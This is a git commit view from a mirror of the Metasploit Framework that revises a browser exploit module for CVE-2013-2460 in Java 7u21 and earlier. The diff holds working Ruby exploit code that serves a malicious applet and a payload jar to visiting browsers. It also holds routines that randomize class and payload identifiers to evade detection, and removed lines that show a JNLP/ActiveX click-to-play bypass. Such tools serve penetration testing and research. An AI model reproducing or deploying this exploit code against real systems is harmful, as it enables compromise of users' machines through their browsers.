infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #2 from jvazquez-r7/provider_skeleton_clean 

provider_skeleton Exploit Clean and Fixes
bug/bundler_fix
matthiaskaiser 2013-06-26 07:03:33 -07:00
parent 8a96b7f9f2 4fa789791d
commit 1caf69c8fa
17 changed files with 48 additions and 97 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/cve-2013-2460/DisableSecurityManagerAction.class Normal file
View File

Binary file not shown.

BIN
data/exploits/cve-2013-2460/ExpProvider.class Normal file
View File

Binary file not shown.

BIN
data/exploits/cve-2013-2460/Exploit.class Normal file
View File

Binary file not shown.

BIN
data/exploits/provider_skeleton/DisableSecurityManagerAction.class
View File

Binary file not shown.

BIN
data/exploits/provider_skeleton/ExpProvider.class
View File

Binary file not shown.

BIN
data/exploits/provider_skeleton/Exploit.class
View File

Binary file not shown.

0
external/source/exploits/provider_skeleton/src/DisableSecurityManagerAction.java → external/source/exploits/cve-2013-2460/DisableSecurityManagerAction.java vendored
View File

0
external/source/exploits/provider_skeleton/src/ExpProvider.java → external/source/exploits/cve-2013-2460/ExpProvider.java vendored
View File

0
external/source/exploits/provider_skeleton/src/Exploit.java → external/source/exploits/cve-2013-2460/Exploit.java vendored
View File

19
external/source/exploits/cve-2013-2460/Makefile vendored Normal file
View File

@ -0,0 +1,19 @@
CLASSES = \
ExpProvider.class \
DisableSecurityManagerAction.class \
Exploit.class
.SUFFIXES: .java .class
.java.class:
javac -source 1.2 -target 1.2 -cp "../../../../data/java:." $*.java
all: $(CLASSES:.java=.class)
install:
mv ExpProvider.class ../../../../data/exploits/cve-2013-2460/
mv DisableSecurityManagerAction.class ../../../../data/exploits/cve-2013-2460/
mv Exploit.class ../../../../data/exploits/cve-2013-2460/
clean:
rm -rf *.class

7
external/source/exploits/provider_skeleton/.classpath vendored
View File

@ -1,7 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<classpath>
<classpathentry kind="src" path="src"/>
<classpathentry kind="con" path="org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/jdk1.7.0_21"/>
<classpathentry kind="lib" path="C:/dev/metasploit.jar"/>
<classpathentry kind="output" path="bin"/>
</classpath>

17
external/source/exploits/provider_skeleton/.project vendored
View File

@ -1,17 +0,0 @@
<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
<name>msf_issue61</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>org.eclipse.jdt.core.javabuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>org.eclipse.jdt.core.javanature</nature>
</natures>
</projectDescription>

11
external/source/exploits/provider_skeleton/.settings/org.eclipse.jdt.core.prefs vendored
View File

@ -1,11 +0,0 @@
eclipse.preferences.version=1
org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.7
org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
org.eclipse.jdt.core.compiler.compliance=1.7
org.eclipse.jdt.core.compiler.debug.lineNumber=generate
org.eclipse.jdt.core.compiler.debug.localVariable=generate
org.eclipse.jdt.core.compiler.debug.sourceFile=generate
org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
org.eclipse.jdt.core.compiler.source=1.7

BIN
external/source/exploits/provider_skeleton/bin/DisableSecurityManagerAction.class vendored
View File

Binary file not shown.

BIN
external/source/exploits/provider_skeleton/bin/ExpProvider.class vendored
View File

Binary file not shown.

BIN
external/source/exploits/provider_skeleton/bin/Exploit.class vendored
View File

Binary file not shown.

91
modules/exploits/multi/browser/java_jre17_provider_skeleton.rb
View File

@ -9,7 +9,7 @@ require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
@ -17,6 +17,8 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
EXPLOIT_STRING = "Exploit"
def initialize( info = {} )
super( update_info( info,
@ -24,19 +26,20 @@ class Metasploit3 < Msf::Exploit::Remote
'Description' => %q{
This module abuses the insecure invoke() method of the ProviderSkeleton class that
allows to call arbitrary static methods with user supplied arguments. The vulnerability
affects Java version 7u21 and earlier. This exploit bypasses click-to-play on Internet Explorer
and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java
Web Start can be launched automatically through the ActiveX control. Otherwise, the
applet is launched without click-to-play bypass.
affects Java version 7u21 and earlier.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisor and also POC
'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC
'Matthias Kaiser' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2460' ],
[ 'OSVDB', '94346' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],
[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],
[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],
[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]
],
@ -74,68 +77,40 @@ class Metasploit3 < Msf::Exploit::Remote
))
end
def setup
path = File.join(Msf::Config.install_root, "data", "exploits", "provider_skeleton", "Exploit.class")
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "provider_skeleton", "ExpProvider.class")
@provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "provider_skeleton", "DisableSecurityManagerAction.class")
@action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
@exploit_class_name = rand_text_alpha("Exploit".length)
@exploit_class.gsub!("Exploit", @exploit_class_name)
@jnlp_name = rand_text_alpha(8)
super
def randomize_identifier_in_jar(jar, identifier)
identifier_str = rand_text_alpha(identifier.length)
jar.entries.each { |entry|
entry.name.gsub!(identifier, identifier_str)
entry.data = entry.data.gsub(identifier, identifier_str)
}
end
def jnlp_file
jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
jnlp = %Q|
<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
<information>
<title>Applet Test JNLP</title>
<vendor>#{rand_text_alpha(8)}</vendor>
<description>#{rand_text_alpha(8)}</description>
<offline-allowed/>
</information>
def setup
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class")
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class")
@provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class")
@action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
<resources>
<j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
<jar href="#{rand_text_alpha(8)}.jar" main="true" />
</resources>
<applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
<param name="__applet_ssv_validated" value="true"></param>
</applet-desc>
<update check="background"/>
</jnlp>
|
return jnlp
@exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)
@exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name)
super
end
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jnlp$/i
send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file("#{@exploit_class_name}.class", @exploit_class)
jar.add_file("ExpProvider.class", @provider_class)
jar.add_file("DisableSecurityManagerAction.class", @action_class)
metasploit_str = rand_text_alpha("metasploit".length)
payload_str = rand_text_alpha("payload".length)
jar.entries.each { |entry|
entry.name.gsub!("metasploit", metasploit_str)
entry.name.gsub!("Payload", payload_str)
entry.data = entry.data.gsub("metasploit", metasploit_str)
entry.data = entry.data.gsub("Payload", payload_str)
}
randomize_identifier_in_jar(jar, "metasploit")
randomize_identifier_in_jar(jar, "payload")
jar.build_manifest
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
@ -154,18 +129,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
def generate_html
jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
# When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass
# Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass
html = %Q|
<html>
<body>
<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
<param name="app" value="#{jnlp_uri}">
<param name="back" value="true">
<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
</object>
<applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
</body>
</html>
|